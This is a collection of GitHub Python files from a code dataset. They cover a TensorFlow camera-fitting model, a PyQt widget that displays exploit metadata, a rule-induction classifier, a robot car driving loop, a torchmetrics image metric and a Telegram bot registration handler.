tf.Variable([-camZ[1]/camZ[0], 1., 0.], dtype=tf.float32, trainable=False)\n camX = normalize(camX)\n\n camY = tf.linalg.cross(camZ, camX)\n\n if camY[2]<0:\n camY = -camY\n camX = -camX\n\n rotM = tf.stack([camX, camY, camZ], axis=0)\n\n #with tf.no_grad():\n self.pos_in_cam_frame.assign( tf.linalg.matvec(-rotM, self._pos))\n self.axis_angle.assign(matrix_to_axis_angle(rotM))\n self._update_extrinsicM() \n\n def set_f_fixed(self, flag):\n self.f_corrfac.requires_grad = not flag\n\n def _update_fov(self):\n self.fov_deg_w = np.rad2deg( np.arctan(self.imgW/2/self.f)*2 )\n self.fov_deg_h = np.rad2deg( np.arctan(self.imgH/2/self.f)*2 )\n print(f\"FOV (deg) Horizontal:{self.fov_deg_h} \")\n\n def _update_intrinsicM(self):\n \"\"\"\n PixXYW = IntrinsicM @ CamFrameXYZ\n need to norm the w component of PixXYW to get pix (x,y) coord\n \"\"\"\n A = tf.constant([\n [ -1, 0, self.imgW/2],\n [ 0, -1, self.imgH/2],\n [ 0, 0, 1],\n ], dtype=tf.float32)\n\n fval = 1./self.f_corrfac * self.initf\n B = tf.stack([fval,fval,1])\n\n self.intrinsicM = A*B\n\n self.perspectiveM = self.intrinsicM @ self.extrinsicM\n \n def _update_extrinsicM(self):\n \"\"\"\n CamFrameXYZ = extrinsicM @ WorldFrameXYZ1\n \"\"\"\n rotMat = axis_angle_to_matrix( self.axis_angle)\n xyzCol = tf.expand_dims(self.pos_in_cam_frame,1)\n extrinsicM = tf.concat( [rotMat, xyzCol], axis=1) # 3x3 ,3x1 -> 3x4\n\n self.extrinsicM = extrinsicM\n self.perspectiveM = self.intrinsicM @ self.extrinsicM\n\n def getPixCoords(self, worldCoords, tune_cam_params=False, getScales=False, doUpdate=True):\n \"\"\"\n worldCoords : numpy array (n,3)\n \"\"\"\n if tune_cam_params:\n if doUpdate:\n # self._update_intrinsicM()\n A = tf.constant([\n [ -1, 0, self.imgW/2],\n [ 0, -1, self.imgH/2],\n [ 0, 0, 1],\n ], dtype=tf.float32)\n\n fval = 1./self.f_corrfac * self.initf\n B = tf.stack([fval,fval,1])\n\n intrinsicM = A*B\n\n # self._update_extrinsicM()\n rotMat = axis_angle_to_matrix( self.axis_angle)\n xyzCol = tf.expand_dims(self.pos_in_cam_frame,1)\n extrinsicM = tf.concat( [rotMat, xyzCol], axis=1) # 3x3 ,3x1 -> 3x4\n\n \n self.perspectiveM = intrinsicM @ extrinsicM\n\n perspectiveM = self.perspectiveM\n else:\n perspectiveM = self.perspectiveM\n\n if type(worldCoords) in [np.ndarray]: worldCoords = tf.Variable(worldCoords, dtype=tf.float32)\n\n xyzws = tf.concat( [worldCoords, tf.ones([1,worldCoords.shape[1], 1])], axis=2 )\n xyws = perspectiveM @ tf.transpose(xyzws, perm=[0,2,1])\n xyws = tf.transpose(xyws, perm=[0,2,1])\n ws = xyws[:,:,2]\n mask = ws>0 # if false, point is behind the cam\n xys = xyws[:,:,0:2] / ws[:,:,None] # normalize w to 1\n\n if getScales:\n cam_frame_xyzs = self.extrinsicM @ tf.transpose(xyzws)\n scale = 1./self.f_corrfac* self.initf / cam_frame_xyzs[2]\n return xys, mask, scale\n else:\n return xys, mask\n \n def call(self, worldCoords):\n xys, mask = self.getPixCoords(worldCoords, tune_cam_params=True, getScales=False, doUpdate=True)\n return xys\n \n def getWorldCoords(self, imgCoords):\n \"\"\"\n inf possible points along a ray in world can give same XY in img, we give the pt that is on the z=0 plane at the world\n \"\"\"\n #with tf.no_grad():\n if type(imgCoords) in [np.ndarray]: imgCoords = tf.Variable(imgCoords, dtype=tf.float32)\n imgCoords = tf.cat( [imgCoords, tf.ones([len(imgCoords), 1])], axis=1 )\n invM = tf.linalg.inv(self.perspectiveM[:,[0,1,3]])\n world_xyws = invM @ tf.transpose(imgCoords)\n world_xyws = tf.transpose(world_xyws)\n\n world_xyzs = tf.zeros_like(world_xyws)\n world_xyzs[:,0:2] = world_xyws[:,0:2] / world_xyws[:,2]\n \n return world_xyzs\n\ndef drawPolygon(pts, canvas = None, color = (255,0,0), imgsize=(1000,1000)):\n if canvas is None:\n canvas = np.zeros((imgsize[0],imgsize[1],3), dtype=np.uint8)\n if type(pts)==tf.Variable:\n pts = pts.numpy()\n\n pts = pts.astype(int)\n for i in range(0,len(pts)-1):\n _ = cv2.line(canvas, tuple(pts[i]), tuple(pts[i+1]), color, 2)\n _ = cv2.line(canvas, tuple(pts[-1]), tuple(pts[0]), color, 2)\n return canvas\n\nif __name__==\"__main__\":\n # unit m\n # rectangle to fit\n recth = 1.0\n rectw = tf.Variable( 1.0, dtype=tf.float32, trainable=True)\n balld = 0.0615\n\n def gen_rect(recth, rectw):\n pts = tf.Variable([\n [-0.5*rectw, 0.5*recth, 0],\n [ 0.5*rectw, 0.5*recth, 0],\n [ 0.5*rectw, -0.5*recth, 0],\n [-0.5*rectw, -0.5*recth, 0],\n ], dtype=tf.float32)\n\n # pts[:,0]*=rectw\n # pts[:,1]*=recth\n\n return pts\n\n pts = gen_rect(recth, rectw)\n\n camera = Camera(800., 1000, 1000)\n camera.set_f(1000.)\n camera.set_pos([-5,1,5])\n camera.set_lookat([0,0,0]) \n \n xys, mask = camera.getPixCoords(pts, tune_cam_params=True)\n print(xys)\n print(mask)\n\n ref_xys = tf.Variable([\n [317.91403682 ,535.04245995],\n [548.6423495 ,415.74897926],\n [662.0134948 ,468.82048839],\n [430.72150222 ,619.99387802],\n ], dtype = tf.float32)\n\n optimizer = tf.keras.optimizers.Adadelta(learning_rate=0.001)\n\n for i in range(3):\n\n with tf.GradientTape() as tape:\n xys, mask = camera.getPixCoords(pts, tune_cam_params=True)\n loss = tf.nn.l2_loss(ref_xys - xys)\n print(i, loss)\n var_list = camera.trainable_variables + [rectw]\n grads = tape.gradient(loss, var_list)\n optimizer.apply_gradients(zip(grads, var_list))\n\n\n\n # opt = optim.Adam( list(camera.parameters()) + [rectw], lr=0.01)\n # lossFunc = nn.L1Loss()\n # for iter in range(10000):\n \n\n # pts = gen_rect(recth, rectw)\n # xys, mask = camera.getPixCoords(pts, tune_cam_params=True)\n # loss = lossFunc(xys, ref_xys)\n # print(f\"iter: {iter} loss: {loss}\")\n # loss.backward()\n # opt.step()\n # opt.zero_grad()\n\n # if (iter%100)==0:\n # canvas = np.zeros((1000,1000,3), dtype=np.uint8)\n # drawPolygon(ref_xys, canvas, (0,255,0) )\n # drawPolygon( xys, canvas, (0,0,255) )\n # cv2.imwrite(f\"./testoutput/iter{iter:04d}.png\", canvas)\n\n # print(f\"rectw: {rectw}\") \n # print(f\"cam f: {camera.initf / camera.f_corrfac}\")\n # print(f\"cam pos: {camera.pos}\")\n\n\n\n\n \n","repo_name":"ylchan87/PoolFit","sub_path":"poolfit/tensorflow_impl/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":9863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"71302441037","text":"from PyQt4.uic import loadUi\nfrom PyQt4.QtCore import Qt\nfrom PyQt4.QtGui import QWidget\nfrom rexploit.lib.misc.parse import Parse\nfrom os.path import join, dirname\n\n\nclass Widget(QWidget):\n def __init__(self, name, parent):\n super(Widget, self).__init__(parent)\n ui = join(dirname(__file__.split('rexploit')[0]),\n join(\"rexploit\", \"data\", \"ui\", \"widgets\", \"exploits\", \"{0}.ui\".format(name)))\n\n loadUi(ui, self)\n self.__exploit = None\n self.__vulnerable = False\n self.parent = parent\n self.category = None\n\n # Connect things\n self.checkBoxVulnerable.stateChanged.connect(self.__checkBoxVulnerableStateChanged)\n\n # Labels\n self.labelAuthor.setTextInteractionFlags(Qt.TextSelectableByMouse)\n self.labelDate.setTextInteractionFlags(Qt.TextSelectableByMouse)\n self.labelTarget.setTextInteractionFlags(Qt.TextSelectableByMouse)\n self.labelDescription.setTextInteractionFlags(Qt.TextSelectableByMouse)\n self.labelDescription.setWordWrap(True)\n\n self.labelCWE.setTextFormat(Qt.RichText)\n self.labelCWE.setTextInteractionFlags(Qt.TextBrowserInteraction)\n self.labelCWE.setOpenExternalLinks(True)\n\n self.labelReferences.setTextFormat(Qt.RichText)\n self.labelReferences.setTextInteractionFlags(Qt.TextBrowserInteraction)\n self.labelReferences.setOpenExternalLinks(True)\n\n # Set verticalLayout. It's resize the widget\n self.setLayout(self.verticalLayout)\n\n def __checkBoxVulnerableStateChanged(self):\n \"\"\"This function executes when checkbox changes state\"\"\"\n if self.checkBoxVulnerable.isChecked():\n self.parent.addExploitSuccess(self.__exploit)\n else:\n self.parent.removeExploitSuccess(self.__exploit)\n\n def setCheckBoxVulnerableChecked(self, checked=True):\n \"\"\"\n This function changes checkbox's state\n :param checked: True or False\n :return: None\n \"\"\"\n if checked:\n self.checkBoxVulnerable.setCheckState(Qt.Checked)\n else:\n self.checkBoxVulnerable.setCheckState(Qt.Unchecked)\n\n @staticmethod\n def check(self):\n \"\"\"This function check all thing that you need before exploit will run\"\"\"\n pass\n\n @property\n def exploit(self):\n \"\"\"\n Get the exploit\n :return: the exploit\n \"\"\"\n return self.__exploit\n\n @exploit.setter\n def exploit(self, exploit):\n \"\"\"\n Setter the exploit\n :param exploit: the exploit\n :return: None\n \"\"\"\n self.__exploit = exploit\n self.labelNameExploit.setText(self.__exploit.name)\n self.labelAuthor.setText(self.__exploit.authors)\n self.labelDate.setText(self.__exploit.date)\n self.labelCWE.setText(Parse.CWEToLink(self.__exploit.cwe))\n self.labelTarget.setText(self.__exploit.target)\n self.labelReferences.setText(self.__exploit.references)\n self.labelDescription.setText(self.__exploit.description)\n\n def setExploit(self, exploit):\n \"\"\"\n This function executes when a element's list is clicked.\n :param exploit: the exploit\n :return: None\n \"\"\"\n pass\n\n @property\n def vulnerable(self):\n return self.__vulnerable\n\n @vulnerable.setter\n def vulnerable(self, state):\n self.__vulnerable = state\n self.__exploit.vulnerable = state\n self.setCheckBoxVulnerableChecked(state)\n","repo_name":"danilabs/rexploit","sub_path":"rexploit/interfaces/widget.py","file_name":"widget.py","file_ext":"py","file_size_in_byte":3518,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"29"} +{"seq_id":"44241327657","text":"# checks given number is even or not\ndef check_number_is_even(number):\n if int(number) % 2 == 0:\n return True\n else:\n return False\n\n\n# check given number is prime or not\ndef check_number_is_prime(number):\n count = 0\n for i in range(number):\n if i != 0 and i != 1 and number % i == 0:\n count = count + 1\n\n if count == 0:\n return True\n else:\n return False\n","repo_name":"maturiKarthik/Python-string-manipulation","sub_path":"Arthematic.py","file_name":"Arthematic.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"39981731563","text":"import pandas as pd\nimport re\n\n\ndef create_lstm_model_df(all_results_list):\n \"\"\"\n Create lstm meta model dataframe for comparison\n \"\"\"\n\n all_results_dict = dict()\n\n for item in all_results_list:\n for k, v in item.items():\n model_params = k.split(\"_\")\n all_results_dict[\n (\"_\".join(model_params[0:2]))\n ] = {\n model_params[3].split(\":\")[0]: int(\n model_params[3].split(\":\")[1]\n ),\n model_params[4].split(\":\")[0]: int(\n model_params[4].split(\":\")[1]\n ),\n model_params[5].split(\":\")[0]: int(\n model_params[5].split(\":\")[1]\n ),\n model_params[6].split(\":\")[0]: int(\n model_params[6].split(\":\")[1]\n ),\n \"val_loss\": float(\n v[\"model-history\"][\"val_loss\"][0]\n ),\n \"loss\": float(\n v[\"model-history\"][\"loss\"][0]\n ),\n \"MAE-holdout-set\": float(\n v[\"MAE-holdout-set\"].split()[1]\n ),\n \"app-bias-mean-holdout-set\": float(\n v[\"app-bias-mean-holdout-set\"]\n ),\n }\n\n all_results_df = pd.DataFrame(all_results_dict).T\n\n return all_results_df\n\n\ndef get_model(lst, datestamp):\n \"\"\"\n Get model from model list by datestamp\n \"\"\"\n\n for item in lst:\n for k, v in item.items():\n model_params = k.split(\"_\")\n date_stamp = \"_\".join(model_params[0:2])\n if date_stamp == datestamp:\n return v[\"model-object\"]\n","repo_name":"nathancoulson/prediction_app","sub_path":"Modelling_Module/model_comparison_lstm.py","file_name":"model_comparison_lstm.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"72317661198","text":"import logging\nfrom abc import abstractmethod, ABC\nfrom typing import List\n\nimport pandas as pd\n\nfrom datasets.dataset_eval import DatasetEval\nfrom rules.rule import Rule\nfrom rules.rule_eval import RuleEval\n\n\nclass FitProgressSubscriber(ABC):\n @abstractmethod\n def update_progress(self, state: int):\n pass\n\n @abstractmethod\n def update_class(self, class_name: str, class_num: int, num_classes: int, total_num_it: int):\n pass\n\n\nclass FitProgressPublisher:\n def __init__(self):\n self.subscribers: List[FitProgressSubscriber] = []\n\n def subscribe(self, s: FitProgressSubscriber):\n self.subscribers.append(s)\n\n def unsubscribe(self, s: FitProgressSubscriber):\n self.subscribers.remove(s)\n\n def notify_progress(self, state: int):\n for s in self.subscribers:\n s.update_progress(state)\n\n def notify_new_class(self, class_name: str, class_num: int, num_classes: int, total_num_it: int):\n for s in self.subscribers:\n s.update_class(class_name, class_num, num_classes, total_num_it)\n\n\nclass Prism(FitProgressPublisher):\n def __init__(self):\n super().__init__()\n self._rules: List[Rule] = []\n self.classes = []\n\n @property\n def rules(self):\n return self._rules\n\n @rules.setter\n def rules(self, value: List[Rule]):\n self._rules = value\n self.classes = list(set(r.cl for r in self._rules))\n\n def fit(self, X: pd.DataFrame, y: pd.Series):\n X_y = X.copy()\n X_y['y'] = y\n rules = []\n classes = y.unique() # all unique values of the target variable\n\n for i, cl in enumerate(classes):\n cl_inst = X_y[y == cl] # data points with the current class\n inst = X_y\n self.notify_new_class(cl, i+1, len(classes), len(cl_inst))\n total_cl_inst = len(cl_inst)\n while len(cl_inst) > 0: # while there are instances of the current class that aren't covered by any rule\n rule = Rule(cl) # create new empty rule\n while len(rule.available_attributes(X_y)) > 0 and not rule.is_perfect(X_y): # while there are attributes that are not yet used in the rule and the rule incorrectly classifies any of the training data\n rule.add_operand(inst) # add operand to the rule that has the highest precision (number of class matches)\n logging.info(f\"Final rule: {rule}\\n\")\n cl_inst = rule.not_matched_inst(cl_inst) # remove instances of the current class that are covered by the new rule\n inst = rule.not_matched_inst(inst) # remove instances that are covered by the new rule\n rules.append(rule)\n self.notify_progress(total_cl_inst - len(cl_inst))\n logging.warning(f\"Class: {cl} ({i+1}/{len(classes)}), {len(cl_inst)} remaining\")\n logging.info(f\"Class {cl} completed\\n\")\n self.rules = rules\n\n def classify(self, X: pd.DataFrame):\n classes = {cl: [] for cl in self.classes}\n y = {idx: [] for idx in X.index}\n for r in self.rules:\n match = r.match(X)\n classes[r.cl].extend(match.index)\n for idx, m in match.iterrows():\n y[idx].append(r.cl)\n\n def get_y(row):\n y_list = y[row.name]\n if len(y_list) == 0:\n return None\n return max(set(y[row.name]), key=y[row.name].count)\n return X.apply(get_y, axis=1)\n\n def evaluate_dataset(self, X_test: pd.DataFrame, y_test: pd.Series):\n y_obt = self.classify(X_test)\n diff = y_test.compare(y_obt)\n num_correct = len(X_test) - len(diff)\n return DatasetEval(num_correct / len(X_test),\n num_correct / y_obt.count(),\n y_obt.count() / len(X_test))\n\n def evaluate_rules(self, X_train: pd.DataFrame, y_train: pd.Series) -> List[RuleEval]:\n y_val_counts = y_train.value_counts()\n results: List[RuleEval] = []\n for rule in self.rules:\n X_match = rule.match(X_train)\n match = X_match.join(y_train, how='inner')\n correct_match = match[match[y_train.name] == rule.cl]\n coverage = len(correct_match) / y_val_counts[rule.cl] if y_val_counts[rule.cl] != 0 else 0\n precision = (len(correct_match) / len(match)) if len(match) != 0 else 0\n results.append(RuleEval(precision, coverage, rule))\n return results\n","repo_name":"EliskaSvobodova/PrismClassifier","sub_path":"prism/prism.py","file_name":"prism.py","file_ext":"py","file_size_in_byte":4501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"38151269955","text":"import pickle\r\nimport time\r\n\"\"\"import multiprocessing\r\nfrom functools import partial\r\nfrom itertools import repeat\r\nimport csv\r\nimport os\r\nimport numpy as np\"\"\"\r\ndirectory='D:\\\\University\\\\Bachelor project\\\\codes\\\\dataset'\r\n\r\n#run it only the first time\r\n\"\"\"nets=[]\r\nfor filename in os.listdir(directory):\r\n if filename.endswith(\".edges\"):\r\n net = filename.strip('.edges')\r\n nets.append(net)\r\nwith open('network.txt', 'w') as f:\r\n for item in nets:\r\n f.write(\"%s\\n\" % item)\"\"\"\r\n\r\n\r\nclass Node(object):\r\n def __init__(self, id, follower, following, network, feature_names):\r\n self.id = id\r\n self.follower = follower\r\n self.following = following\r\n self.network = network\r\n #self.features = features\r\n self.feature_names = feature_names\r\n\r\ndef create_featnames(line):\r\n data_line = line.rstrip().split('\\t')\r\n return data_line[0].split()[1]\r\n\r\ndef read_neighbour_net_node(data_line,net,neighbours, network, nodes): #find neighbours and network of nodes\r\n #neighbours.append(data_line)\r\n for item in data_line:\r\n neighbours.append(item)\r\n if item in nodes:\r\n if net not in network[nodes.index(item)]:\r\n network[nodes.index(item)].append(net)\r\n else:\r\n nodes.append(item)\r\n network.append([net])\r\n\r\n\r\nneighbours = []\r\nnodes = []\r\nnetwork = []\r\nlist_egos = []\r\n\r\nwith open('network.txt', 'r') as f:\r\n for item in f:\r\n list_egos.append(item.strip('\\n'))\r\n\r\nn=0\r\nfor net in list_egos:\r\n address = \"%s\\\\edges\\\\%s.edges\" % (directory, net)\r\n f = open(address)\r\n neighbours.append([])\r\n for line in f:\r\n data_line = line.rstrip().split()\r\n read_neighbour_net_node(data_line, net, neighbours[n], network, nodes)\r\n n += 1\r\n\r\n\r\nfor ind,ego in enumerate(list_egos):\r\n followings = set()\r\n followers=set()\r\n featurenames={}\r\n features={}\r\n if ego not in nodes:\r\n for nei in neighbours[ind]:\r\n followings.add(nei)\r\n networks_of_id=[ego]\r\n f = open(\"%s\\\\featnames\\\\%s.featnames\" % (directory, ego))\r\n feat_names = []\r\n feat_names=list(map(create_featnames, f))\r\n featurenames[ego] = feat_names\r\n\r\n f = open(\"%s\\\\egofeat\\\\%s.egofeat\" % (directory, ego))\r\n for line in f:\r\n data_line = line.rstrip().split('\\t')\r\n features[ego] = data_line[0].split()\r\n\r\n one_features = []\r\n name_one_features=[]\r\n for ind,feat in enumerate(features[ego]):\r\n if feat=='1':\r\n one_features.append(feat)\r\n name_one_features.append(featurenames[ego][ind])\r\n\r\n features[ego]=one_features\r\n featurenames[ego]=name_one_features\r\n\r\n with open(ego+'.pkl', 'wb') as output:\r\n node_inst = Node(ego,followers,followings,networks_of_id,featurenames)\r\n pickle.dump(node_inst, output)\r\n del node_inst\r\n\r\n\r\n\r\nfor ind,id in enumerate(nodes):\r\n followers=set()\r\n followings=set()\r\n featurenames={}\r\n features={}\r\n networks_of_id=network[ind]\r\n indexes=[]\r\n for x,net in enumerate(list_egos):\r\n for y in networks_of_id:\r\n if net==y:\r\n indexes.append(x)\r\n for n in indexes: # n:number of networks for each node\r\n for count,nei in enumerate(neighbours[n]):\r\n if nei==id:\r\n if(count%2==0):\r\n followings.add(neighbours[n][count+1])\r\n else:\r\n followers.add(neighbours[n][count-1])\r\n f = open(\"%s\\\\featnames\\\\%s.featnames\" % (directory, str(list_egos[n])))\r\n featurenames[list_egos[n]]=list(map(create_featnames, f))\r\n\r\n if id not in list_egos:\r\n for item in networks_of_id:\r\n followers.add(item) #\r\n f = open(\"%s\\\\feat\\\\%s.feat\" % (directory, str(list_egos[n])))\r\n feats=[]\r\n for count, line in enumerate(f):\r\n data_line = line.rstrip().split('\\t')\r\n l=data_line[0].split()\r\n if l[0]==id:\r\n feats=l[1:]\r\n features[list_egos[n]]=feats\r\n break\r\n else:\r\n f = open(\"%s\\\\egofeat\\\\%s.egofeat\" % (directory, str(list_egos[n])))\r\n for item in neighbours[n]:\r\n followings.add(item)\r\n networks_of_id.append(id)\r\n for count, line in enumerate(f):\r\n data_line = line.rstrip().split('\\t')\r\n features[list_egos[n]] = data_line[0].split()\r\n\r\n one_features = []\r\n name_one_features = []\r\n for inde, feat in enumerate(features[list_egos[n]]):\r\n if feat == '1':\r\n one_features.append(feat)\r\n name_one_features.append(featurenames[list_egos[n]][inde])\r\n\r\n features[list_egos[n]] = one_features\r\n featurenames[list_egos[n]] = name_one_features\r\n\r\n with open(id + '.pkl', 'wb') as output:\r\n node_inst = Node(id, followers, followings, networks_of_id, featurenames)\r\n pickle.dump(node_inst, output)\r\n del node_inst\r\n\r\n\r\n\r\n\r\n","repo_name":"ShararehY/InfluenceGraph-Twitter","sub_path":"make_pickle.py","file_name":"make_pickle.py","file_ext":"py","file_size_in_byte":5170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"7506647474","text":"from rcar import rsimplecar\nfrom rcar import rstandardcar\nimport os\nimport sys\nimport cv2\nimport copy\nfrom picamera import PiCamera\nfrom training.units import *\nimport numpy\nimport time\nimport datetime\nfrom threading import Thread\nfrom pistreaming import server\nimport random\nimport picamera.array\nfrom gopigo import *\n\nRUNNING = True\nLSPEED = 150\nRSPEED= 130\nRADIUS = 2\ndef userinput():\n global RUNNING\n while True:\n if input(\"input\") == \"x\":\n break;\n RUNNING = False\n\ndef main(arg):\n # initialize input\n # Thread(target=userinput).start()\n\n #initialize car\n # car = rsimplecar.SimpleCar(speed=180,radius=1.5,freq=10)\n # car = rstandardcar.Car(acceleration=6,radius=3,freq=20)\n # car.start()\n\n #initialize decision network\n ANN = Network.fromFile(sys.argv[1])\n DNN = Network.fromFile(\"./training/nnd.save\")\n\n #main loop\n try:\n with picamera.PiCamera() as camera:\n with picamera.array.PiRGBArray(camera) as output:\n while RUNNING:\n output.truncate(0)\n camera.capture(output, 'rgb',use_video_port=True)\n img = cv2.cvtColor(output.array, cv2.COLOR_BGR2GRAY)\n img = cv2.GaussianBlur(img,(5,5),0)\n img = cv2.resize(img,(16,12))\n img = np.multiply(1/255,np.ndarray.flatten(img))\n res = ANN.evaluate(img)\n\n L = 0\n S = 1\n R = 2\n DETECT_THRESHOLD = 1\n COOLING = 2\n detect_count = 0\n cooling = 0\n curr_decision = res.index(max(res))\n # branch_decisions = [S,S,L,S,S,R,S,S,L,R]\n # if DNN.evaluate(img)[0] > 0.5:\n # print(\"\")\n # if detect_count < DETECT_THRESHOLD:\n # detect_count += 1\n # else:\n # curr_decision = branch_decisions.pop()\n # print(\"\"%(curr_decision))\n # cooling += 1\n # if cooling == COOLING:\n # detect_count = 0\n # cooling = 0\n # else:\n # detect_count = 0\n # cooling = 0\n # motion\n # if random.random() > 0.2: car.w()\n if curr_decision == L:\n left()\n time.sleep(0.3)\n # car.a()\n print(\"\")\n elif curr_decision == S:\n straight()\n print(\"\")\n elif curr_decision == R:\n right()\n # car.d()\n print(\"\")\n else:\n assert False\n # input(\"hit any key to continue\")\n except KeyboardInterrupt:\n stop()\n # car.stop()\n # car.shutdown()\n print(\"Thank you for using auto. Bye!\")\ndef left():\n motor1(1,int(0.6*LSPEED*(1-0.5/RADIUS)))\n motor2(1,int(0.6*RSPEED*(1+0.5/RADIUS)))\n\ndef right():\n motor1(1,int(0.8*LSPEED*(1+0.5/RADIUS)))\n motor2(1,int(0.8*RSPEED*(1-0.5/RADIUS)))\n\ndef straight():\n motor1(1,LSPEED)\n motor2(1,RSPEED)\ndef stop():\n motor2(1,0)\n motor1(1,0)\nif __name__ == \"__main__\":\n main(\"\")\n\n\n# if len(sys.argv) > 3: cv2.imwrite(os.path.join(sys.argv[2],str(decision)+\"-\"+str(datetime.datetime.now())+\".jpg\"),img0)\n\n","repo_name":"zhichul/pi-bob","sub_path":"src/rplugin/auto.py","file_name":"auto.py","file_ext":"py","file_size_in_byte":3727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"9421091012","text":"from typing import Tuple\n\nimport torch\nfrom torch import Tensor\nfrom typing_extensions import Literal\n\nfrom torchmetrics.utilities.checks import _check_same_shape\nfrom torchmetrics.utilities.distributed import reduce\n\n\ndef _sam_update(preds: Tensor, target: Tensor) -> Tuple[Tensor, Tensor]:\n \"\"\"Update and returns variables required to compute Spectral Angle Mapper.\n\n Args:\n preds: Predicted tensor\n target: Ground truth tensor\n\n \"\"\"\n if preds.dtype != target.dtype:\n raise TypeError(\n \"Expected `preds` and `target` to have the same data type.\"\n f\" Got preds: {preds.dtype} and target: {target.dtype}.\"\n )\n _check_same_shape(preds, target)\n if len(preds.shape) != 4:\n raise ValueError(\n \"Expected `preds` and `target` to have BxCxHxW shape.\"\n f\" Got preds: {preds.shape} and target: {target.shape}.\"\n )\n if (preds.shape[1] <= 1) or (target.shape[1] <= 1):\n raise ValueError(\n \"Expected channel dimension of `preds` and `target` to be larger than 1.\"\n f\" Got preds: {preds.shape[1]} and target: {target.shape[1]}.\"\n )\n return preds, target\n\n\ndef _sam_compute(\n preds: Tensor,\n target: Tensor,\n reduction: Literal[\"elementwise_mean\", \"sum\", \"none\", None] = \"elementwise_mean\",\n) -> Tensor:\n \"\"\"Compute Spectral Angle Mapper.\n\n Args:\n preds: estimated image\n target: ground truth image\n reduction: a method to reduce metric score over labels.\n\n - ``'elementwise_mean'``: takes the mean (default)\n - ``'sum'``: takes the sum\n - ``'none'`` or ``None``: no reduction will be applied\n\n Example:\n >>> gen = torch.manual_seed(42)\n >>> preds = torch.rand([16, 3, 16, 16], generator=gen)\n >>> target = torch.rand([16, 3, 16, 16], generator=gen)\n >>> preds, target = _sam_update(preds, target)\n >>> _sam_compute(preds, target)\n tensor(0.5914)\n\n \"\"\"\n dot_product = (preds * target).sum(dim=1)\n preds_norm = preds.norm(dim=1)\n target_norm = target.norm(dim=1)\n sam_score = torch.clamp(dot_product / (preds_norm * target_norm), -1, 1).acos()\n return reduce(sam_score, reduction)\n\n\ndef spectral_angle_mapper(\n preds: Tensor,\n target: Tensor,\n reduction: Literal[\"elementwise_mean\", \"sum\", \"none\", None] = \"elementwise_mean\",\n) -> Tensor:\n \"\"\"Universal Spectral Angle Mapper.\n\n Args:\n preds: estimated image\n target: ground truth image\n reduction: a method to reduce metric score over labels.\n\n - ``'elementwise_mean'``: takes the mean (default)\n - ``'sum'``: takes the sum\n - ``'none'`` or ``None``: no reduction will be applied\n\n Return:\n Tensor with Spectral Angle Mapper score\n\n Raises:\n TypeError:\n If ``preds`` and ``target`` don't have the same data type.\n ValueError:\n If ``preds`` and ``target`` don't have ``BxCxHxW shape``.\n\n Example:\n >>> from torchmetrics.functional.image import spectral_angle_mapper\n >>> gen = torch.manual_seed(42)\n >>> preds = torch.rand([16, 3, 16, 16], generator=gen)\n >>> target = torch.rand([16, 3, 16, 16], generator=gen)\n >>> spectral_angle_mapper(preds, target)\n tensor(0.5914)\n\n References:\n [1] Roberta H. Yuhas, Alexander F. H. Goetz and Joe W. Boardman, \"Discrimination among semi-arid\n landscape endmembers using the Spectral Angle Mapper (SAM) algorithm\" in PL, Summaries of the Third Annual JPL\n Airborne Geoscience Workshop, vol. 1, June 1, 1992.\n\n \"\"\"\n preds, target = _sam_update(preds, target)\n return _sam_compute(preds, target, reduction)\n","repo_name":"Lightning-AI/torchmetrics","sub_path":"src/torchmetrics/functional/image/sam.py","file_name":"sam.py","file_ext":"py","file_size_in_byte":3753,"program_lang":"python","lang":"en","doc_type":"code","stars":1718,"dataset":"github-code","pt":"4"} +{"seq_id":"8600272482","text":"from aiogram.dispatcher import FSMContext\r\nfrom aiogram.types import Message, CallbackQuery\r\n\r\nfrom handlers.utils import track_user_activity\r\nfrom keyboards import directions_kb, division_kb, topics_kb, kb2b\r\nfrom loader import dp, db, bot\r\nfrom my_logger import logger\r\nfrom config import directions_list, divisions_list\r\n\r\n\r\n@dp.callback_query_handler(text='expert_start')\r\nasync def expert_start(call: CallbackQuery, state: FSMContext):\r\n user = call.from_user\r\n\r\n if db.get_applicant(user.id) is not None:\r\n track_user_activity(user.id, \"experts\", \"Сменить роль\")\r\n\r\n db.remove_user(\"applicants\", user.id)\r\n\r\n logger.debug(f\"Applicant {user.id} was removed from database\")\r\n\r\n logger.debug(f\"Expert {user.id} entered expert_start handler\")\r\n date = call.message.date.strftime('%d.%m.%Y %H:%M')\r\n try:\r\n db.add_expert(user.id, date, user.username, user.first_name,\r\n user.last_name, \"Заполняет анкету\")\r\n await call.answer(cache_time=5)\r\n await call.message.answer(text=\"Как вас зовут?\\n\\n\"\r\n \"Формат: Алексей\",\r\n disable_notification=True)\r\n await call.message.edit_reply_markup()\r\n await state.set_state('expert_1')\r\n except Exception as e:\r\n logger.debug(f\"Expert {user.id} was not recorded as a new user: {e}\")\r\n\r\n\r\n@dp.message_handler(state='expert_1')\r\nasync def expert_1(message: Message, state: FSMContext):\r\n user_id = message.from_user.id\r\n\r\n db.update_user('experts', 'wr_fullname', user_id, message.text)\r\n await message.answer(text=\"Выберите направление:\",\r\n reply_markup=directions_kb,\r\n disable_notification=True)\r\n await state.set_state('expert_2')\r\n logger.debug(f\"Expert {user_id} entered expert_1 handler\")\r\n\r\n\r\n@dp.callback_query_handler(state='expert_2')\r\nasync def expert_2(call: CallbackQuery, state: FSMContext):\r\n user_id = call.from_user.id\r\n\r\n db.update_user('experts', 'direction', user_id, directions_list[int(call.data)])\r\n await call.answer(cache_time=5)\r\n await call.message.answer(text=\"Выберите дивизион:\",\r\n reply_markup=division_kb,\r\n disable_notification=True)\r\n await call.message.edit_reply_markup()\r\n await state.set_state('expert_3')\r\n logger.debug(f\"Expert {user_id} entered 